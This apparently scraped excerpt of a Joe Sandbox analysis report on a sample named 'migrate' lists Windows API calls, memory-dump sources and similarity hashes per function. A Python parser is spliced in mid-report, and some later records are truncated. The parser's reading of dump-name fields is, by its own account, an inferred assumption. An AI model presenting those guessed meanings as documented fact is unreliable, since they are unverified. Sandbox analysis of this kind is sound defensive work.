• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: FileWrite$Handle
• String ID:
• API String ID: 4209713984-0
• Opcode ID: 91d467c3ce5e5e9c1f140043a5d2de1b70ab8bbca1ebdfab4afed37fd3f559ca
• Instruction ID: eb53e37f3affb95622d83eaad6301d45ed557de64b8e1858bf2549e10d97e78c
• Opcode Fuzzy Hash: 91d467c3ce5e5e9c1f140043a5d2de1b70ab8bbca1ebdfab4afed37fd3f559ca
• Instruction Fuzzy Hash: C131D331205306AFDB18CF20D828BAE7BA5FF85715F00062DF9519B290C7759DC9CBA2

APIs
  • Part of subcall function 0011C27E: _wcslen.LIBCMT ref: 0011C284
• CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0011A175,?,00000001,00000000,?,?), ref: 0011A2D9
• CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0011A175,?,00000001,00000000,?,?), ref: 0011A30C
• GetLastError.KERNEL32(?,?,?,?,0011A175,?,00000001,00000000,?,?), ref: 0011A329
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: CreateDirectory$ErrorLast_wcslen
• String ID:
• API String ID: 2260680371-0
• Opcode ID: 37fbf3aa51f9364c3085eb74811a1a7b05ab4396a9b6be34bae7e566ccea6b55
• Instruction ID: aac651c4f8c29394ce274443683066dc3ec603b843c2ea9933742764d623058e
• Opcode Fuzzy Hash: 37fbf3aa51f9364c3085eb74811a1a7b05ab4396a9b6be34bae7e566ccea6b55
• Instruction Fuzzy Hash: 5301F7352123206AEF29AB755C49BFE3B98BF1A780F844435F912E6091D764CAC1C6B7

APIs
• GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0013B8B8
Strings
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: Info
• String ID:
• API String ID: 1807457897-3916222277
• Opcode ID: 3282b6938355c6dc349930d276512d348482d9d7654789de4dacadee12c1797d
• Instruction ID: 54cb2225957a6824034df56aa132b4bc834d74dffe9141d1a5b751f6595023a5
• Opcode Fuzzy Hash: 3282b6938355c6dc349930d276512d348482d9d7654789de4dacadee12c1797d
• Instruction Fuzzy Hash: CB41F6B050828C9ADF258E648CD4BF6BBA9EF55308F1404EDE69A87142E335AA458B60

APIs
• LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,000000FF), ref: 0013AFDD
Strings
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: String
• String ID: LCMapStringEx
• API String ID: 2568140703-3893581201
• Opcode ID: 0ee61a96d65ee5b0387b380005feb262c7e291a90bdd26d33dc96a75672800d2
• Instruction ID: 66bc42953d259a29392ff5957c5325f6a203c39ca93761dac190fb9f12fe03cc
• Opcode Fuzzy Hash: 0ee61a96d65ee5b0387b380005feb262c7e291a90bdd26d33dc96a75672800d2
• Instruction Fuzzy Hash: D201E536504219BBCF129F90DC06DEE7F66EF09764F414154FE1466170CB728A71AB91

APIs
• InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0013A56F), ref: 0013AF55
Strings
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: CountCriticalInitializeSectionSpin
• String ID: InitializeCriticalSectionEx
• API String ID: 2593887523-3084827643
• Opcode ID: e94693d8842c4fdf0126981ce4e2485ccf727b64ffaf06711f8ba63620701acf
• Instruction ID: 9be2288fc46ea80e01529336e81c112c4d9d669993dbf20f80d12a1881293439
• Opcode Fuzzy Hash: e94693d8842c4fdf0126981ce4e2485ccf727b64ffaf06711f8ba63620701acf
• Instruction Fuzzy Hash: 5AF0BE35645218BBCF12AF50DC02CAEBFA5EF15B21F404068FC18AA2B0DB714A219B86
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Alloc
                                                                                                                                                                                                    • String ID: FlsAlloc
                                                                                                                                                                                                    • API String ID: 2773662609-671089009
                                                                                                                                                                                                    • Opcode ID: bede85d2a460aa947a95b8751d1c681d685a1bf043667390feda7b87d26a43c2
                                                                                                                                                                                                    • Instruction ID: 26d5038b69f8233104ec9357c52514907c434a25a0b1fe51b23799dce7dc3670
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bede85d2a460aa947a95b8751d1c681d685a1bf043667390feda7b87d26a43c2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D2E02B317492187BC711ABA5DC02D6EBB94DF65B31F4101A9FC05972A0DF705E4186D6
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012EAF9
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID: 3Ro
                                                                                                                                                                                                    • API String ID: 1269201914-1492261280
                                                                                                                                                                                                    • Opcode ID: 049f8dd91d3c232962dba55d0a64f86bc1ea9d17d92586cd4b0f3d154854a41d
                                                                                                                                                                                                    • Instruction ID: 9d7d81830891e9e7b95ab185fa8c52fec4f812dae0335472313bf8b4b33fdc09
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 049f8dd91d3c232962dba55d0a64f86bc1ea9d17d92586cd4b0f3d154854a41d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9DB012D629B0727D310862003E02C37015CC1D1B90332C02EF414D50D1EF810C111471
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0013B7BB: GetOEMCP.KERNEL32(00000000,?,?,0013BA44,?), ref: 0013B7E6
                                                                                                                                                                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0013BA89,?,00000000), ref: 0013BC64
                                                                                                                                                                                                    • GetCPInfo.KERNEL32(00000000,0013BA89,?,?,?,0013BA89,?,00000000), ref: 0013BC77
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CodeInfoPageValid
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 546120528-0
                                                                                                                                                                                                    • Opcode ID: a77a5a80f663bb337a354c41484e082a327be0d540f0c323f401e633007ca009
                                                                                                                                                                                                    • Instruction ID: 6d315fe691ddbde1159e6fd9d8c41db4c7499da5368b7e8dd186acf523ea41c0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a77a5a80f663bb337a354c41484e082a327be0d540f0c323f401e633007ca009
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 96514770D082459FDB24CFB5C8C16BABBF5EF51308F14406ED6968B2A1F7359946CB90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00119A50,?,?,00000000,?,?,00118CBC,?), ref: 00119BAB
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00118411,-00009570,00000000,000007F3), ref: 00119BB6
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2976181284-0
                                                                                                                                                                                                    • Opcode ID: e784a37bbc91f5a7a50b1ffa7b0d04cd625c5c6e0f8407d8173700c3ae925ac5
                                                                                                                                                                                                    • Instruction ID: d319e767127bcf23469cd40fa4d89b7cd55e79b5965eb4e211813028dd501b41
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e784a37bbc91f5a7a50b1ffa7b0d04cd625c5c6e0f8407d8173700c3ae925ac5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E941CF745083018FDB2CDF15E5A4CAAB7E5FFD5320F158A3DE8A183260D770AD848A99
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 001397E5: GetLastError.KERNEL32(?,00151098,00134674,00151098,?,?,001340EF,?,?,00151098), ref: 001397E9
                                                                                                                                                                                                      • Part of subcall function 001397E5: _free.LIBCMT ref: 0013981C
                                                                                                                                                                                                      • Part of subcall function 001397E5: SetLastError.KERNEL32(00000000,?,00151098), ref: 0013985D
                                                                                                                                                                                                      • Part of subcall function 001397E5: _abort.LIBCMT ref: 00139863
                                                                                                                                                                                                      • Part of subcall function 0013BB4E: _abort.LIBCMT ref: 0013BB80
                                                                                                                                                                                                      • Part of subcall function 0013BB4E: _free.LIBCMT ref: 0013BBB4
                                                                                                                                                                                                      • Part of subcall function 0013B7BB: GetOEMCP.KERNEL32(00000000,?,?,0013BA44,?), ref: 0013B7E6
                                                                                                                                                                                                    • _free.LIBCMT ref: 0013BA9F
                                                                                                                                                                                                    • _free.LIBCMT ref: 0013BAD5
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _free$ErrorLast_abort
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2991157371-0
                                                                                                                                                                                                    • Opcode ID: 0097ba2859a1cacadb215ce942e7d8b4f8a75450983dfe9a130ed9730a682795
                                                                                                                                                                                                    • Instruction ID: f5573c1fa13f0a3eea1d678ac4c93917a3d643a7256cb63a0cbe82ff126d332c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0097ba2859a1cacadb215ce942e7d8b4f8a75450983dfe9a130ed9730a682795
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE31D73190860DAFDB10EFA8D481B9DB7F5EF51324F254099FA04AB2A2FB725D40DB50
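The per-function records above (APIs, Memory Dump Source, Joe Sandbox IDA Plugin, Similarity) are what a practitioner pivots on across reports, so here is a parser for that format. This is an added example, not Joe Sandbox's own code: it turns each record into a structured object (API calls with the address of the subcall that makes them, the dump the function was lifted from, and the similarity hashes), decodes the .sdmp file name, and cross-checks it against the snapshot file name. The sample input is constructed from two records copied from this excerpt. The reading of the .sdmp name fields as PID, stage, base address and page protection is an assumption inferred from the values on this page (PID 0x1A = 26 and base 0x110000 agree with hcaresult_26_2_110000; 0x20, 0x02 and 0x04 are the Windows protection constants for the code, header and data regions respectively), not documented Joe Sandbox semantics.

```python
"""Parser for Joe Sandbox function records. Added example, not Joe Sandbox code."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: two records copied from the report excerpt above.
SAMPLE = """\
APIs
• SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00119A50,?,?,00000000,?,?,00118CBC,?), ref: 00119BAB
• GetLastError.KERNEL32(?,00000000,00118411,-00009570,00000000,000007F3), ref: 00119BB6
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
• Opcode ID: e784a37bbc91f5a7a50b1ffa7b0d04cd625c5c6e0f8407d8173700c3ae925ac5
• Instruction Fuzzy Hash: E941CF745083018FDB2CDF15E5A4CAAB7E5FFD5320F158A3DE8A183260D770AD848A99
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0012EAF9
  • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
  • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
Strings
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: 3Ro
• API String ID: 1269201914-1492261280
• Instruction Fuzzy Hash: 9DB012D629B0727D310862003E02C37015CC1D1B90332C02EF414D50D1EF810C111471
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "name.MODULE(args), ref: ADDR" or "name.MODULE ref: ADDR"
API_RE = re.compile(r"^(?P<name>[^.(\s]+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")
SUBCALL_RE = re.compile(r"^Part of subcall function (?P<parent>[0-9A-Fa-f]+): (?P<rest>.*)$")
# Assumption: the fifth .sdmp field is the Windows page protection of the dumped region.
PROTECTION = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x20: "PAGE_EXECUTE_READ"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: int
    parent: Optional[int]  # address of the subcall making this call; None if direct


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    source_file: str = ""
    offset: int = 0
    associated: list = field(default_factory=list)
    snapshot_file: str = ""
    similarity: dict = field(default_factory=dict)


def parse_api(text, parent=None):
    m = SUBCALL_RE.match(text)
    if m:  # nested call: unwrap and remember the parent subcall address
        return parse_api(m.group("rest"), int(m.group("parent"), 16))
    m = API_RE.match(text)
    if not m:
        raise ValueError(f"unrecognised API line: {text!r}")
    args = m.group("args").split(",") if m.group("args") else []
    return ApiCall(m.group("name"), m.group("module"), args, int(m.group("ref"), 16), parent)


def parse_records(text):
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":  # every record opens with its APIs heading
                rec = FunctionRecord()
                records.append(rec)
            section = line
            continue
        if rec is None or not line.startswith("•"):
            continue
        body = line[1:].strip()
        if section == "APIs":
            rec.apis.append(parse_api(body))
        elif section == "Memory Dump Source":
            key, _, val = body.partition(": ")
            if key == "Source File":
                rec.source_file, _, tail = val.partition(", ")
                m = re.search(r"Offset: ([0-9A-Fa-f]+)", tail)
                rec.offset = int(m.group(1), 16) if m else 0
            elif key == "Associated":
                rec.associated.append(val)
        elif section == "Joe Sandbox IDA Plugin" and body.startswith("Snapshot File: "):
            rec.snapshot_file = body[len("Snapshot File: "):]
        elif section == "Similarity":
            key, _, val = body.partition(":")
            rec.similarity[key.strip()] = val.strip()
    return records


def decode_dump_name(name):
    """Assumed layout: <pid>.<stage>.<seq>.<base>.<protection>.<...>.sdmp, all hex."""
    f = name.rsplit(".sdmp", 1)[0].split(".")
    return {"pid": int(f[0], 16), "stage": int(f[1], 16), "base": int(f[3], 16),
            "protection": PROTECTION.get(int(f[4], 16), hex(int(f[4], 16)))}


def dump_consistent(rec):
    """Snapshot name must carry the dump's PID and stage and the record's module offset."""
    m = re.match(r"hcaresult_(\d+)_(\d+)_([0-9A-Fa-f]+)_", rec.snapshot_file)
    d = decode_dump_name(rec.source_file)
    return bool(m) and (int(m.group(1)), int(m.group(2)), int(m.group(3), 16)) == (d["pid"], d["stage"], rec.offset)


def direct_imports(records):
    """MODULE!name of every call the dumped function makes itself (subcalls excluded)."""
    return {f"{a.module}!{a.name}" for r in records for a in r.apis if a.parent is None}


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for r in recs:
        print(r.similarity.get("API ID"), decode_dump_name(r.source_file), dump_consistent(r))
    print(sorted(direct_imports(recs)))
```

The records' API String ID, Opcode ID and Instruction Fuzzy Hash values survive the parse unchanged in `similarity`, so the same loader can index a whole report by fuzzy hash for comparison against other samples; the `dump_consistent` check catches the one bookkeeping error that silently ruins such pivots, a function attributed to the wrong process or module base.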
APIs
• __EH_prolog.LIBCMT ref: 00111E55
  • Part of subcall function 00113BBA: __EH_prolog.LIBCMT ref: 00113BBF
• _wcslen.LIBCMT ref: 00111EFD
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: H_prolog$_wcslen
• String ID:
• API String ID: 2838827086-0
APIs
• FlushFileBuffers.KERNEL32(?,?,?,?,?,?,001173BC,?,?,?,00000000), ref: 00119DBC
• SetFileTime.KERNELBASE(?,?,?,?), ref: 00119E70
Similarity
• API ID: File$BuffersFlushTime
• String ID:
• API String ID: 1392018926-0
APIs
• CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00119F27,?,?,0011771A), ref: 001196E6
• CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00119F27,?,?,0011771A), ref: 00119716
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
APIs
• SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00119EC7
• GetLastError.KERNEL32 ref: 00119ED4
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
APIs
• _free.LIBCMT ref: 00138E75
  • Part of subcall function 00138E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00134286,?,0000015D,?,?,?,?,00135762,000000FF,00000000,?,?), ref: 00138E38
• HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00151098,001117CE,?,?,00000007,?,?,?,001113D6,?,00000000), ref: 00138EB1
Similarity
• API ID: Heap$AllocAllocate_free
• String ID:
• API String ID: 2447670028-0
APIs
• GetCurrentProcess.KERNEL32(?,?), ref: 001210AB
• GetProcessAffinityMask.KERNEL32(00000000), ref: 001210B2
Similarity
• API ID: Process$AffinityCurrentMask
• String ID:
• API String ID: 1231390398-0
                                                                                                                                                                                                    • Opcode ID: 021a907a542b7fd6fabe4d4a8d7334cfabcea5852f4af132721696845da6a141
                                                                                                                                                                                                    • Instruction ID: 3f6eed8a793aad1c3e8b40e6fc102af283389532a2efd794f5d8410136b5d519
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 021a907a542b7fd6fabe4d4a8d7334cfabcea5852f4af132721696845da6a141
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E6E09276B00255B7CF09CBA5AC058AF72EDEA542043104175F413D3501FA30DE814764
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0013BF30: GetEnvironmentStringsW.KERNEL32 ref: 0013BF39
                                                                                                                                                                                                      • Part of subcall function 0013BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0013BF5C
                                                                                                                                                                                                      • Part of subcall function 0013BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0013BF82
                                                                                                                                                                                                      • Part of subcall function 0013BF30: _free.LIBCMT ref: 0013BF95
                                                                                                                                                                                                      • Part of subcall function 0013BF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0013BFA4
                                                                                                                                                                                                    • _free.LIBCMT ref: 001382AE
                                                                                                                                                                                                    • _free.LIBCMT ref: 001382B5
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
